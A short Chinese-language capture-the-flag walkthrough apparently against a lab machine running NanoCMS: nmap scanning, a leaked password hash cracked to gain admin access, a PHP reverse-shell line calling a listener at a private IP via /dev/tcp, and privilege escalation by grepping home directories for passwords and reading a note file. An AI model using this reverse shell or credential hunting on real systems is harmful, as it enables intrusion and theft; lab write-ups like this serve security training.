常规端口扫描
开放端口较多
--script=vuln漏洞扫描脚本扫描结果非常多,80端口涉及Dos,敏感信息,sql注入,csrf等,其中我们比较关心的可能是sql注入和敏感信息。总之肯定先从web入手。
查看功能点
可以观察到在Blog界面暴露了cms为Nanocms,同时貌似还有一个跳转至管理界面的位置Admin Login,点击链接,可到达Nanocms的管理后台登录界面,如下:
goole查一下nanocms exploit
第一和第三好像市泄露了密码漏洞
访问一下data/pagesdata.txt
应该是md5加密
解密得到密码密码shannon
登入后台
找找哪个地方可以反弹shell
添加php反弹shell代码试试
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.200.131/1234 0>&1'"); ?>
nc -lvnp 1234
保存后退回首页,再次点击contact
成功反弹shell
提权
常规枚举经过一系列的搜索,没发现特殊的信息,结合/etc/passwd中有Bash的用户有很多,很有可能其中的某个用户会在自己家目录中的文件里写入有关root的密码。我们在/home目录搜索一下包含'pass'字符串的文件有哪些,命令如下:
grep -R -i pass /home/* 2>/dev/null
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
su 切换时出现报错
python -c "import pty;pty.spawn('/bin/bash')"争强交互性
成功提权